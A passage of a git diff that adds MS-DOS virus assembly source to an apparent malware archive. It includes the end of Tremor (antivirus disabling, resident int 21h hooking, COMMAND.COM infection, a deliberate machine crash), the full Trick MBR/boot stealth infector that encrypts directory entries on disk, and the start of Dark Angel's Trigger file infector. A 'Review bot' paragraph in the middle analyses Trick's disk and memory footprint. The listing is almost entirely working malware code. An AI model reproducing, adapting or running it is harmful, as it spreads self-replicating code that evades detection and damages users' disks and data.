mov cx,word ptr ds:[data_x02] + mov al,0 ; seek from begin of file + call seek ; to filepos cx:dx + xor cx,cx + jmp truncate ; write 0 byte -> truncate tremor +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +checkifinfected:call scramblebuffer + cmp word ptr cs:[1ch+si],0deadh + jne loc_ret_150 ; back with nz ! 
+ cmp byte ptr cs:[si],0e9h + je loc_ret_150 + cmp word ptr cs:[si],5a4dh +loc_ret_150: retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +scramblebuffer: mov si,offset buffer + push si + mov ax,cs:[si+1eh] +loc_151: xor cs:[si],ax + add ax,913fh + inc si + inc si + cmp si,106bh + jne loc_151 + pop si + retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +setflag_cs_00: mov byte ptr cs:[flag],0ffh + retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +getflag_cs_00: mov al,cs:[flag] + retn +;-------------------------------------------------------------------------- +; out : real mem-top +;-------------------------------------------------------------------------- +getrealmemorysize: + mov dx,paras_needed ; dx = 10ch +GetTremMem: + nop ; dx = - 10ch + mov byte ptr cs:[enablegetmem],0 ; enable mem-handler + mov ah,52h + call performint21 + call getfrstmcb +loc_152: cmp byte ptr [di],5ah + je lastmcbfound + push ds + pop es + call getnextmcb + jmp loc_152 +lastmcbfound: add ds:[di+3],dx ; = add / sub 10ch + retn +;-------------------------------------------------------------------------- +; out : ds = seg of next mcb in chain +;-------------------------------------------------------------------------- +getnextmcb: mov ax,ds + inc ax + add ax,ds:[di+3] + mov ds,ax + retn +;-------------------------------------------------------------------------- +; out : es=dos-segment and ds:si = first mcb +;-------------------------------------------------------------------------- +get_1stmcb: mov ah,52h + int 21h +getfrstmcb: lds di,dword ptr es:[bx-4] ; get first mcb + retn +;-------------------------------------------------------------------------- +; 
+;-------------------------------------------------------------------------- +chkfilesize: cmp dx,word ptr cs:[data_x02] + jne loc_ret_154 + cmp bx,word ptr cs:[data_x01] +loc_ret_154: retn +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +checkforfprot: mov byte ptr cs:[BP_Flag],1 + mov ax,0ff0fh + pushf + call dword ptr cs:[tremor_21] + cmp ax,101h + mov byte ptr cs:[BP_Flag],0 + retn +;-------------------------------------------------------------------------- +;int 13 - pc tools v8+ vsafe, vwatch - api +; ah = fah +; dx = 5945h +; al = function (00h-07h) +;return: varies by function +;-------------------------------------------------------------------------- +checkforvsafe: mov ax,0fa02h ; switch it off + mov dx,5945h + int 13h + retn +;---------------------------------------------------------------------- +message1: db "-=> t.r.e.m.o.r was done by neurobasher /" + db " may-june'92, germany <=-",0 +message2: db ".moment.of.terror.is.the.beginning.of.life.",0 +;---------------------------------------------------------------------- +newint15: push ax + in al,60h + cmp al,53h ; del-key pressed + jnz no_del_key ; no->bye + + push ds + mov ax,40h + mov ds,ax + mov al,byte ptr ds:[17h] + test al,1100b ; ctrl+alt pressed ? 
+ jz bye_int09 + + push bx + push cx + push dx + push si + mov ax,700h + xor bx,bx + mov cx,bx + mov dx,187fh + int 10h + mov ah,02 + mov dx,907h ; set cursor + int 10h + mov si,offset message1 + call print_message + mov dx,0f13h + int 10h + mov si,offset message2 + call print_message + mov cx,96h +locloop_155: push cx + mov cx,0ffffh + +locloop_156: jmp $+2 + loop locloop_156 + + pop cx + loop locloop_155 + + pop si + pop dx + pop cx + pop bx + +bye_int09: pop ds +no_del_key: pop ax + cli + jmp dword ptr cs:[internal_15] + ;-------------------------------- + +print_message: mov al,cs:[si] + xor al,9ch + cmp al,0 + je loc_ret_160 + int 29h + inc si + jnz print_message +loc_ret_160: retn +;-------------------------------------------------------------------------- +; reset ints + registers. +;-------------------------------------------------------------------------- +trem_popall: cli + call resetints + +getorigregs: mov ax,03c4h + mov ds,ax + mov ax,9ef5h + mov es,ax + mov ax,4300h + mov bx,0faceh + mov cx,1989h + mov dx,000eh + db 0beh ; mov si,xxxx +old__si dw 11b7h + mov di,008ah + mov bp,0070h + sti + retn +flickerflag equ $+1 +random_1 dw 0 +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +checkfortremor: xor bx,bx + mov ds,bx + lds si,dword ptr ds:[4+bx] ; int 01 starts with iret ? + cmp byte ptr [si],0cfh + jne loc_162 ; no -> jmp + + cmp ah,30h ; + jne loc_164 + push cx ; save cx,dx + push dx + mov ah,2ah ; get system-date + call performint21 + pop bx + pop bp + mov ax,offset random_1 ; compare cx,dx to sys-dat + cmp bp,cx ; tremor first calls sys-date + jne loc_163 ; then dos-version. + cmp bx,dx ; -- extended self-check. 
+ jne loc_163 + +loc_162: mov ax,offset selftest +loc_163: mov word ptr cs:[org_487],ax +loc_164: jmp getorigregs +;-------------------------------------------------------------------------- +; +;-------------------------------------------------------------------------- +newint01: push ax + push bx + push si + call reloc_int1 +reloc_int1: pop si ; si = offset reloc_int1 + mov bx,sp + mov ax,ss:[bx+8] ; callerseg +Dos_Seg equ $+1 + cmp ax,129h + ja loc_165 + + mov cs:[si+offset trace_result-offset reloc_int1+2],ax + mov ax,ss:[bx+6] ; caller-offset + mov cs:[si+offset trace_result-offset reloc_int1 ],ax + and byte ptr ss:[bx+0bh],0feh; reset tf + jmp loc_166 + +loc_165: push cs + pop ax + cmp ax,ss:[bx+8] ; first steps + je loc_166 ; or end of int + + mov ax,ss:[bx+8] + mov cs:[si+offset tracetemp-offset reloc_int1+2],ax + mov ax,ss:[bx+6] + mov cs:[si+offset tracetemp-offset reloc_int1 ],ax + +loc_166: pop si + pop bx + pop ax + iret +;------------------------------------------------------------------------ + ; +SpecialFiles db 'CH' +Trace_Result db 'ME','MI' + db 'F2','F-' +Tracetemp db 'SY','SI' + db 'PM' + ; chkdsk + ; mem + ; mirror + ; f-prot + ; sys + ; si + ; + ; unused : + ; + db 'RJ','KZ','AH' ; ARJ,PKZIP,LHA + +AnyFile db '\*.*',0 +BP_Flag dw 0 ; + dw 0 + db 0,0,0 +;------------------------------------------------------------------- +; installation +;------------------------------------------------------------------- +virinstall: call cda +cda: pop si + mov ah,2ah ; get current date + mov word ptr cs:[si+offset start_psp-offset cda],es + int 21h + mov al,72h ; "jb" +org_ce8h equ $+2 + ;--------------------------------------------------- + cmp dx,504h ; now : 4. mai ? + jb loc_168 ; previous -> jmp + ;--------------------------------------------------- +org_ceeh equ $+2 + ;--------------------------------------------------- + cmp cx,7c9h ; 1993 ? 
+org_cf0 equ $ + jae loc_169 ; after -> jmp + ;--------------------------------------------------- +loc_168: mov al,0ebh ; "jmp"-> disable psycho... + ; +loc_169: mov cs:[si+offset psycholabel-offset cda],al + ; + mov ah,30h + cld + int 21h + xchg al,ah + cmp ax,31dh ; dosversion < 3.30 -> stop + ja loc_171 +loc_170: jmp vir_install_done + +my_call equ $+1 +loc_171: mov ax,0f1e9h ; "tremor" + int 21h + +selftest equ $+1 + cmp ax,0cadeh + je loc_170 + + xor di,di ; di=0 + mov ax,40h + mov ds,ax + mov bp,ds:[di+13h] ; get max-memory + mov cl,6 + shl bp,cl ; bp = top of memory + mov ah,62h ; + int 21h ; get psp + mov ds,bx ; + push word ptr ds:[di+2ch] ; push env-seg + push ds ; ds = psp-segment + ; + mov cl,90h ; mov cl,"nop" +;--------------------------------------------------------------= + mov ax,5800h ; get mem strategy + int 21h ; + xor ah,ah ; + push ax + mov ax,5801h ; set it to "give umb first" + mov bx,80h + int 21h + mov ax,5802h ; get mem linkstate + int 21h + xor ah,ah + push ax + mov ax,5803h ; link umbs + mov bx,1 + int 21h + jc loc_172 + mov ah,48h ; get memory + mov bx,0ffffh + int 21h ; how much is there + mov ah,48h + int 21h + mov es,ax + cmp ax,bp + jae loc_173 ; enough ! + + + dec ax ; else try xms-umbs + mov es,ax + mov es:[di+1],di + + + +loc_172: mov ax,4300h ; xms installed ? + int 2fh + cmp al,80h + jne loc_174 ; no : jmp + + + mov ax,4310h ; get xms-entry + int 2fh + push cs + pop ds + + mov word ptr ds:[si+offset bp_flag-offset cda ],bx + mov word ptr ds:[si+offset bp_flag-offset cda+2],es + + mov ah,10h ; get umb + mov dx,0ffffh ; how much available ? + call dword ptr ds:[si+offset bp_flag-offset cda] + + cmp bl,0b0h ; check errorcode. 
+ jne loc_174 ; "out of mem" : jmp + ; -> request all memory + mov ah,10h + call dword ptr ds:[si+offset bp_flag-offset cda] + dec ax ; "ok" -> ax=1 + jnz loc_174 ; nz -> ax has not been "1" + mov es,bx ; else : segment in bx + +loc_173: mov cl,0c3h + + mov ax,es + dec ax + mov ds,ax + + mov byte ptr [di],5ah ; + mov ds:[di+1],di + sub word ptr ds:[di+3],paras_needed + + call getnextmcb + + mov word ptr cs:[si+offset trem_mcb-offset cda],ax + inc ax + mov es,ax ; es = future virusseg + +loc_174: pop bx + mov ax,5803h + int 21h + pop bx + mov ax,5801h + int 21h + pop ds + + mov cs:[si+offset gettremmem-offset cda],cl + + cmp cl,90h + jne loc_175 + + push ds + pop es + mov bx,0ffffh + mov ah,4ah + int 21h + mov ax,paras_needed + sub ds:[di+3],ax + ; + sub bx,ax + mov ah,4ah + int 21h + + mov ax,ds + inc ax + add ax,bx + mov es,ax ; es=virussegment + +loc_175: push si ; si = offset 0cda + + push cs + pop ds + + sub si,offset cda - offset extra + mov cx,offset buffer - offset extra + mov di,offset extra + rep movsb ; copy virus-code + ; to dest-memory + + add di,32 ; skip buffer + sub si,offset buffer-offset writevirus + mov cx,offset buffer-offset writevirus + rep movsb + + pop si ; pop offset cda + push es + ;----------------------------( get int 21h)----- + mov ax,3521h ; get int 21 + int 21h + pop ds ; ds=virus-seg + cwd ; dx=0 + mov di,offset random_1 + mov [di],dx + mov word ptr ds:[org_487],di; + + mov di,82h ; + mov ds:[di+ 6],es ; -> int 21h + mov ds:[di+ 4],bx + mov ds:[di+16h],es + mov ds:[di+14h],bx + ;----------------------------( get int 15h )----- + mov al,15h + int 21h + mov ds:[di+18h],bx + mov ds:[di+1ah],es + + call setflag_cs_00 + xor cx,cx + call get_1stmcb + + mov word ptr cs:[si+offset dos_seg-offset cda],es +loc_176: or cx,cx + jnz loc_177 + + mov ax,ds ; ds=mcb-seg + inc ax + cmp ax,ds:[di+1] ; mcb-owner = itself ? + jne loc_177 ; no....... 
+ + mov cx,ax ; else -> segment in cx + push ds + +loc_177: cmp byte ptr cs:[si+offset psycholabel-offset cda],90h + je loc_178 ; if "nop" then low-mem + + cmp byte ptr [di],5ah ; last mcb reached ? + jne loc_179 ; if "yes"-> abort scan + +trem_mcb equ $+1 + mov ax,0eef4h + jmp loc_181 + +loc_178: cmp word ptr ds:[di+offset psycholabel+16+2],0c402h + jne loc_179 + + cmp word ptr ds:[di+offset psycholabel+16+4],0f24h + je loc_180 + +loc_179: push ds + pop es + call getnextmcb + jmp loc_176 + +loc_180: mov byte ptr es:[di],5ah ; vir-mcb found + mov ds:[di+1],cx ; set owner = itself + +loc_181: pop cx ; get low_dos_mcb + inc cx + + inc ax + mov ds,cx + + mov word ptr cs:[si+offset low_dos_mcb -offset cda],cx + mov word ptr cs:[si+offset low_dos_mcb_2-offset cda],cx + mov word ptr cs:[si+offset low_dos_mcb_3-offset cda],cx + + call sub_56 + + mov di,4eh + call sub_57 + mov word ptr ds:[di+6],offset newint15 + push ax ; save vir-seg + + push cs + pop ds + + mov word ptr ds:[si+offset org_cf0-offset cda],0 + push ax ; save virus-seg + + mov ax,3501h ; get int 01 + int 21h + + mov di,bx + mov bp,es + + mov ah,25h ; set tracer-int + lea dx,[si+offset newint01-offset cda] + int 21h + + pop es ; get virus-seg + + pushf + pop ax + or ah,1 + push ax + popf + mov ah,30h + pushf + call dword ptr es:[internal_21] + ; + mov ax,2501h ; reset tracer-int + mov dx,di + mov ds,bp + int 21h + + push cs + pop ds ; ds=cs + + push si ; save offset cda + add si,offset trace_result-offset cda + + mov di,offset internal_21 + movsw ; copy dos-entry to + movsw ; es=virus-segment + ; ds=cs + pop si ; get vir-entry + + mov ax,word ptr ds:[si+offset org_cf0-offset cda] + + or ax,ax + jnz loc_183 +loc_182: +low_dos_mcb equ $+1 + + mov ax,0 + mov ds,ax + mov dx,5 ; set int21 to inttable-> + mov ax,2521h ; crash the machine + int 21h + jmp loc_188 +;--------------------------------------------------------------------- +loc_183: xor bx,bx + dec ax ; ax = mcb-seg to check + call check_my_mcb + jz 
loc_184 ; nz= size > 0a000, ax=size + ; zf= size <=0a000, cx=size + sub ax,10h ; + call check_my_mcb ; + jnz loc_182 ; +;--------------------------------------------------------------------- +loc_184: cli ; cx = size of mcb + mov bp,ds ; +locloop_185: inc bp + mov ds,bp ; ds = psp-seg + + xor bx,bx +loc_186: mov ax,cs:[si+offset trace_result -offset cda] + cmp ax,[bx] ; psp:000, dort steht aber 20cd... + jne loc_187 + + mov ax,cs:[si+offset trace_result+2 -offset cda] + cmp ax,ds:[bx+2] + jne loc_187 + + mov word ptr ds:[bx ],5 ; offset 5 +low_dos_mcb_2 equ $+3 + mov word ptr ds:[bx+2],0 ; in low-dos-seg + +loc_187: inc bx + cmp bl,10h + jne loc_186 + loop locloop_185 + sti +loc_188: pop es ; pop virus-segment (umb) + + push cs + pop ds + + mov ah,1ah ; set dta + lea dx,[si+offset buffer-offset cda] + mov bx,dx ; dta in umb ! + int 21h +;--------------------------------------------------------------------- + mov ah,4eh ; findfirst + mov cx,8 ; attribut = volume ! + lea dx,[si+offset anyfile-offset cda] + int 21h ;----------------------- + ; volume found : + ;----------------------- + mov ax,ds:[bx+16h] ; get files time + mov cx,ds:[bx+18h] ; get files date + +volume_time equ $+1 + cmp ax,6f55h ; time + jne loc_189 ; 13:58:42 + +volume_date equ $+2 + cmp cx,1981h ; date=1981h= + je loc_190 ; 12-1-92 + + ; activate screen flickering +loc_189: mov byte ptr es:[offset psycholabel],0ebh + +loc_190: mov word ptr es:[offset volume_time],ax + mov word ptr es:[offset volume_date],cx + + push es ; es=ds=virseg (umb) + pop ds + cmp byte ptr ds:[offset psycholabel],0ebh + je loc_191 + +low_dos_mcb_3 equ $+1 + mov bx,0 + mov ds,bx + mov ax,2515h + mov dx,0053h ; set int 15h + int 21h ; + +loc_191: pop ds ; get environment-segment + xor bx,bx + ; search comspec= +loc_192: cmp word ptr [ bx],4f43h ; 'co' + jne loc_193 + cmp word ptr [bx+6],3d43h ; 'c=" + je loc_194 + +loc_193: inc bx ; + cmp bh,8 + jne loc_192 + jmp vir_install_done + + ;-------------- ( infect command.com 
)------------------- +loc_194: lea dx,[bx+8] ; comspec found. + mov ax,4300h ; bx points to string in + mov bx,0faceh ; comspec + int 21h + +vir_install_done: + call sub_54 +sub_54: pop si ; relocate again.. + xor ax,ax + lea di,[si+offset extra-offset sub_54] + + mov cx,(offset kill_label1-offset extra) / 2 + push cs + pop es +kill_label1: rep stosw + add di,offset check_my_mcb-offset kill_label1 + mov cx,(offset buffer-offset check_my_mcb) + rep stosb + +start_psp equ $+1 + mov bx,3c4h + mov ds,bx + push ds + pop es + mov dx,80h + mov ah,1ah ; set dta to psp:80h (default) + int 21h + +com_flag equ $+1 + mov al,1 + or al,al + jz loc_196 + + mov word ptr ds:[101h],103h ; set jmp in com-file +init_jump equ $-2 + push cs + jmp loc_197 + +loc_196: cli + mov ax,cs +init_ss equ $+1 + sub ax,0 + mov ss,ax +init_sp equ $+1 + mov sp,0 + sti + mov ax,cs +init_cs equ $+1 + sub ax,0 + push ax + +init_ip equ $+1 +loc_197: mov ax,100h + push ax + sti + xor ax,ax + mov bx,ax + mov cx,ax + cwd + mov si,ax + mov di,ax + mov bp,ax + retf +;-------------------------------------------------------------------------- +; in : bx=0, ds=cs +;-------------------------------------------------------------------------- +check_my_mcb: mov ds,ax ; + cmp byte ptr [bx],44h ; data-mcb. 
+ je loc_198 + cmp byte ptr [bx],4dh ; mem-mcb + jne loc_ret_199 + +loc_198: mov ax,ds:[bx+3] ; size of mcb + cmp ah,0a0h ; hi-size > a0 + ja loc_ret_199 + + xchg ax,cx + xor bp,bp ;-> zf, else nz +loc_ret_199: retn +;-------------------------------------------------------------------------- +sub_56: mov word ptr ds:[di+6],offset virint21 +sub_57: mov byte ptr ds:[di+5],0eah + mov ds:[di+8],ax ; jmp tremor:int21 + retn ; +;-------------------------------------------------------------------------- +data_x01 dw 0 +data_x02 dw 0 +;-------------------------------------------------------------------------- +writevirus: call code_decode + mov cx,4000 + mov dx,offset extra + mov ah,40h + pushf + call dword ptr ds:[internal_21] + pushf + push ax + push cx +org_1081 equ $+1 + mov al,0 + mov byte ptr ds:[data_103-buf_len],al ; -> add [di],al + call code_decode + pop cx + pop ax + popf + retn +;-------------------------------------------------------------------------- +code_decode: mov ax,0 + mov di,offset buffer + mov cx,0 +locloop_200: +xdata_103 db 31h ; xor [di],ax +xdata_0108 db 5 ; 31 5 = xor [di],ax + db 5 ; 31 35 = xor [di],si +xdata_0109 dw 0 ; = add ax,xxxx + inc di + inc di + loop locloop_200 + retn + +tempint24: xor al,al + iret +;---------------------------------------------( end of virus )------ +buf_len equ offset buffer-offset writevirus +zdata_103 equ offset xdata_103 -offset writevirus +zdata_0108 equ offset xdata_0108-offset writevirus +zdata_0109 equ offset xdata_0109-offset writevirus +ztempint24 equ offset tempint24 -offset writevirus +buffer: db 32 dup (?) +sub_58 equ $ +data_103 equ $+zdata_103 +data_0108 equ $+zdata_0108 +data_0109 equ $+zdata_0109 +posint24 equ $+ztempint24 +;-------------------------------------------------------------------------- +code_seg ends + end start +;-------------------------------------------------------------------------- + 
diff --git a/MSDOS/Virus.MSDOS.Unknown.trick446.asm b/MSDOS/Virus.MSDOS.Unknown.trick446.asm new file mode 100644 index 00000000..6e18c7de --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.trick446.asm 
@@ -0,0 +1,255 @@ +; Trick Virii (446 bytes length!) +; (l) 1997 copyleft by Psychomancer // SPS. +; 2:454/7.64@FidoNet + +; MBR/BOOT/EXE stealth hard-removable infector. +; Thanx 2 Nutcracker 4 "cryp_sec" algorithm. + +; WARNING! 4 compile tasm /m option needed! +; DON'T RUN IT! ONLY 4 DEMONSTRATION! + +model tiny +.code + +begin: mov cx,decryp_len + call $+3 + xor ah,ah + int 15h ; antiheuristic trick (must b CF=1 on return) + pop si + sbb al,al ; <- set AL in zero manual on 1st execute! + ; (in DEBUG) + lea di,[si+decryp_begin-6] +xor_decryp: sub al,0 +xor_mask equ $-begin-1 + xor cs:[di],al ; decrypt selfbody + inc di + loop xor_decryp +decryp_begin equ $-begin +decryp_code: sub si,6 + jz file_start ; goto if run from file + mov bx,7c00h + xor di,di + mov ds,di + mov ss,di + mov sp,bx + dec word ptr ds:[413h] ; decrease TOM + mov ax,[di+3*4] + mov [si+rom_mask],ax ; store crypt mask + int 12h + mov cx,206h + mov [si+offrand],ch ; set in 2 + shl ax,cl + mov es,ax + push ss bx + rep movsb ; move selfbody 2 new segm + push es + mov es,cx + mov cl,go_after_move + push cx + retf + +;-----------------------------------------------; + +file_start: mov ax,0deadh + int 13h ; we present in memory? + jnc file_exit + mov ah,13h + int 2fh + mov ax,259ah + int 21h ; set int 9ah on ROM int 13h + mov ah,13h + int 2fh + push cs + pop es + mov ax,1600h + int 2fh + cmp ax,1600h ; we execute under windoze? + mov al,0 + org $-1 + jnc $ ; no - will b crypt direntries + org $-1 + je no_win_run + mov al,0 + org $-1 + jmp $ ; yeah - no crypt direntries + org $-1 +no_win_run: mov cs:cryp_switch,al ; store it + lea bx,buffer + call copy_2_mbr ; infect mbr on 1st hd +file_exit: .exit + +;-----------------------------------------------; + +go_after_move equ $-begin + mov si,13h*4 + mov di,9ah*4 + movsw ; set int 9ah on ROM int 13h + movsw + mov word ptr [si-4],offset int_13h_entry ; hook int 13h + mov [si-2],ax + cmp byte ptr [bx],0ebh ; we loading from floppy boot? 
+ jne load_from_mbr + call copy_2_mbr ; yeah - infect mbr on 1st hd +load_from_mbr: mov cl,11h ; read original mbr code +read_sec: mov dx,80h + mov ax,201h + int 9ah + retf ; exit + +;-----------------------------------------------; + +int_13h_entry: mov cs:store_fn,ah + mov cs:store_sc,al + cmp ax,0deadh ; our function? + je exit_13h_retf + int 9ah ; call old int 13h + pushf + push ax si di ds dx cx es + pop ds + jc exit_13h ; exit if error + mov ax,0 +store_fn = byte ptr $-2 + cmp dl,80h ; non-1st hd? + je hd_access + cmp al,3 ; write? + jne exit_13h + cmp dx,cx ; floppy? + ja no_boot_write + dec cx ; boot? + jnz no_boot_write + mov word ptr [bx],3eebh ; yeah - infect floppy boot + jmp copy_2_boot +no_boot_write: mov ax,[bx] + not ax + mul ah + sub ax,72bah ; 'MZ' or 'ZM' in buffer? + jnz exit_13h + int 1ah ; get timer tick + mov cl,0 ; randomize +offrand equ $-begin-1 + xchg dx,ax + cwd + idiv cx ; get random + and dx,dx + jnz exit_13h + mov [bx+6],dx ; set number of relocation on zero + mov word ptr [bx+8],4 ; length of header + mov [bx+14h],dx ; set cs:ip on zero (i.e. on trick ;) + mov [bx+16h],dx + rol byte ptr cs:offrand,1 ; change randomize +copy_2_boot: lea di,[bx+40h] + call crypt_self ; self encrypt and move 2 buffer + pop cx dx + call write_sec ; write sector on disk + jmp exit_13h_pop +hd_access: cmp al,2 ; read? + jne no_stealth + and dh,dh ; head is zero? + jnz hd_read + dec cx ; cyl/sec is 0/1? + jnz hd_read + mov cl,11h + push cs + call read_sec ; read original mbr +exit_13h: pop cx dx +exit_13h_pop: pop ds di si ax + popf +exit_13h_retf: retf 2 ; exit from int 13h +no_stealth: cmp al,3 ; write? 
+ jne exit_13h +hd_read: mov cs:cryp_or_decryp,0 ; set "js" + org $-1 + js $ + org $-1 + call crypt_sec ; encrypt direntries in buffer +cryp_switch label byte + jnc decrypt_sec ; goto if direntries is not found + pop cx ; restore cyl/sec + push cx + mov ah,3 + int 9ah ; re-write crypted direntries +decrypt_sec: lea ax,exit_13h ; decrypt direntries in buffer + push ax + +;-----------------------------------------------; + +crypt_sec: mov cx,0 ; number of sector +store_sc = byte ptr $-2 + push cx + mov si,bx +scan_next_sec: push cx + mov cl,10h ; number of direntries on one sector +scan_next_elem: push cx si + mov cl,0bh +next_char_name: lodsb + cmp al,' ' ; check if filename + jb get_next_elem + loop next_char_name + lodsb + test al,11001000b ; check if attribute + jnz get_next_elem + mov cl,9 +next_char_res: lodsb + and al,al ; check if normal (not long!) filename + jnz get_next_elem + loop next_char_res + test [si],dl ; already en/decrypted? +cryp_or_decryp label byte + js get_next_elem + xor [si],dl ; en/decrypt direntry + mov ax,0 ; mask of crypt +rom_mask equ $-begin-2 + sub ax,[si+1] + xor [si+5],ax + mov ah,1 ; set bit +get_next_elem: pop si cx + add si,20h ; get next direntry + loop scan_next_elem + pop cx ; get next sector + loop scan_next_sec + inc cs:cryp_or_decryp ; change condition + sahf ; store bit on cf + pop ax + retn + +;-----------------------------------------------; + +crypt_self: push cs + pop ds + xor si,si + in al,40h ; get random mask + mov [si+xor_mask],al + mov cl,decryp_begin + rep movsb ; move unencrypted part + mov ah,-1 + mov cx,decryp_len +xor_encryp: sub ah,al + movsb + xor es:[di-1],ah + loop xor_encryp ; move and encrypt selfbody + retn + +;-----------------------------------------------; + +copy_2_mbr: mov cx,1 + push cs + call read_sec ; read mbr on 1st hd + cmp byte ptr es:[bx],0 ; already infected? 
+ org $-1 + mov cx,0 + org $-2 + je already_prs + mov cl,11h + call write_sec ; store original mbr in 0/0/17 + mov di,bx + call crypt_self ; move and encrypt selfbody + inc cx ; cx=1 +write_sec: mov ax,301h + int 9ah ; infect mbr +already_prs: retn + +decryp_len equ $-decryp_code +len_body equ $-begin +buffer label byte + + end begin diff --git a/MSDOS/Virus.MSDOS.Unknown.trigger.asm b/MSDOS/Virus.MSDOS.Unknown.trigger.asm new file mode 100644 index 00000000..0c0fd30b --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.trigger.asm 
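Review bot: The header calls this a "hard-removable" MBR infector but never states the on-disk and in-memory footprint an analyst needs, so a summary comment under the "DON'T RUN IT" line is what I would add. From the visible code: the original MBR is saved to cylinder 0, head 0, sector 17 of drive 80h (`mov cl,11h` before `write_sec` in copy_2_mbr), a read of 0/0/1 with head 0 is answered from that copy (the `hd_access` path of int_13h_entry), the top-of-memory word at 0:413h is decremented by 1 KB, and the ROM int 13h vector is duplicated into int 9Ah before int 13h itself is redirected to `int_13h_entry`. The "hard-removable" part appears to be that directory entries are XOR-scrambled on the hard disk with a mask taken from the low word of the int 3 vector (`mov ax,[di+3*4]` stored at `rom_mask`) and only unscrambled in the read buffer while the handler is resident, so rewriting the MBR from clean media alone would leave directories unreadable; recovery would need that saved mask as well. A line such as `; footprint: orig MBR at C/H/S 0/0/17 of 80h; TOM 0:413h -1KB; int 13h hooked, ROM vector copied to int 9Ah; direntries XOR-scrambled on disk with rom_mask` after the warning would make the listing usable for triage.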
@@ -0,0 +1,500 @@ + .model tiny + .code + .radix 16 + org 0 + + viruslength = (heap - entry) + virussizeK = (endvirus - entry + 3ff) / 400 + virussizepara = (virussizeK)*40 + + EXE_ID = 'PS' + +entry: + call past +next: + db 0,"Trigger by Dark Angel of Phalcon/Skism",0Dh,0A + db "Utilising Dark Angel's Multiple Encryptor (DAME)",0Dh,0A + db 0Dh,0A,0 + +checkstub db 72,0FA,0E,1F,0BA,00,0B8,0B8,40,00,8E,0C0,26,81,3E,63 + +past: cld + pop bp + + mov ax,0cf0 + mov bx,'DA' + int 21 + cmp bx,'GH' + jnz no_trigger +trigger: + push ds + push es + + push cs + pop ds + xor ax,ax +checkagain: + lea si,[bp+checkstub-next] + mov es,ax + xor di,di + mov cx,8 + rep cmpsw + jz trigger_it + inc ax + cmp ax,0a000 + jb checkagain + jmp exit_trigger +trigger_it: + mov [bp+patch-next],ax + mov ds,ax + mov byte ptr ds:73,0cbh + push bp + mov bp,-80 + jmp short $+2 + db 09a ; call far ptr + dw 1 +patch dw ? + pop bp + mov byte ptr ds:73,1f +exit_trigger: + pop es + pop ds + jmp short restore + +no_trigger: + mov ax,4b90 + int 21 + cmp ax,bx + jz restore + + push ds + push es + + mov ax,ds + dec ax + mov ds,ax + sub word ptr ds:3,virussizepara + sub word ptr ds:12,virussizepara + mov es,ds:12 + + push cs + pop ds + + xor di,di + lea si,[bp+offset entry-offset next] + mov cx,(viruslength + 1)/2 + rep movsw + + xor ax,ax + mov ds,ax + sub word ptr ds:413,virussizeK + + mov di,offset oldint21 + mov si,21*4 + movsw + movsw + + cli + + pushf + pushf + pop ax + or ah,1 + push ax + + mov ds:1*4+2,es + mov word ptr ds:1*4,offset int1_1 + + popf + + mov ah,30 + pushf + call dword ptr ds:21*4 + + popf + + lds si,dword ptr es:oldint21 + mov di,si + lodsw + mov word ptr es:int21patch1,ax + lodsw + mov word ptr es:int21patch2,ax + lodsb + mov byte ptr es:int21patch3,al + + push ds ; es:di->int 21 handler + push es + pop ds ; ds->high segment + pop es + + mov al,0ea + stosb + mov ax,offset int21 + stosw + mov ax,ds + stosw + sti + + pop es + pop ds + +restore: + cmp sp,-2 + jnz restoreEXE +restoreCOM: 
+ lea si,[bp+readbuffer-next] + mov di,100 + push di + movsw + movsw + ret +restoreEXE: + mov ax,ds + add ax,10 + add cs:[bp+readbuffer+16-next], ax + add ax,cs:[bp+readbuffer+0e-next] + mov ss,ax + mov sp,cs:[bp+readbuffer+10-next] + jmp dword ptr cs:[bp+readbuffer+14-next] + +readbuffer dw 20cdh + dw 0bh dup (?) + +int1_1: + push bp + mov bp,sp + push ax + + mov ax, [bp+4] ; get segment + cmp ax, cs:oldint21+2 + jae exitint1 + mov cs:oldint21+2,ax + mov ax, [bp+2] + mov cs:oldint21,ax +exitint1: + pop ax + pop bp + iret + +int1_2: + push bp + mov bp,sp + push ax + + mov ax,cs + cmp ax,[bp+4] + jz exitint1 + + mov ax,[bp+4] + cmp ax,cs:oldint21+2 + jnz int1_2_restore + + mov ax,[bp+2] + cmp ax,cs:oldint21 + jb int1_2_restore + sub ax,5 + cmp ax,cs:oldint21 + jbe exitint1 +int1_2_restore: + push es + push di + cld + les di,dword ptr cs:oldint21 + mov al,0ea + stosb + mov ax,offset int21 + stosw + mov ax,cs + stosw + pop di + pop es + + and [bp+6],0feff + jmp exitint1 + +install: + mov bx,ax + iret +int21: + cmp ax,4b90 + jz install + + push ds + push di + lds di,dword ptr cs:oldint21 + mov word ptr ds:[di],1234 +int21patch1 = $ - 2 + mov word ptr ds:[di+2],1234 +int21patch2 = $ - 2 + mov byte ptr ds:[di+4],12 +int21patch3 = $ - 1 + pop di + pop ds + + cld + + cmp ax,4b00 + jz infect + +exitint21: + push ds + push ax + + xor ax,ax + mov ds,ax + cli + mov word ptr ds:1*4,offset int1_2 + mov ds:1*4+2,cs + sti + + pushf + pop ax + or ah,1 + push ax + popf + pop ax + pop ds + db 0ea +oldint21 dw 0, 0 + +callint21: + pushf + call dword ptr cs:oldint21 + ret + +already_infected: + pop dx + pop cx + mov ax,5701 + call callint21 + + mov ah,3e + call callint21 +exitnoclose: + mov ax,4301 + pop dx + pop ds + pop cx + call callint21 + +exitinfect: + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + jmp exitint21 + +infect: + push ax + push cx + push dx + push bx + push bp + push si + push di + push ds + push es + + mov ax,4300 + call callint21 + 
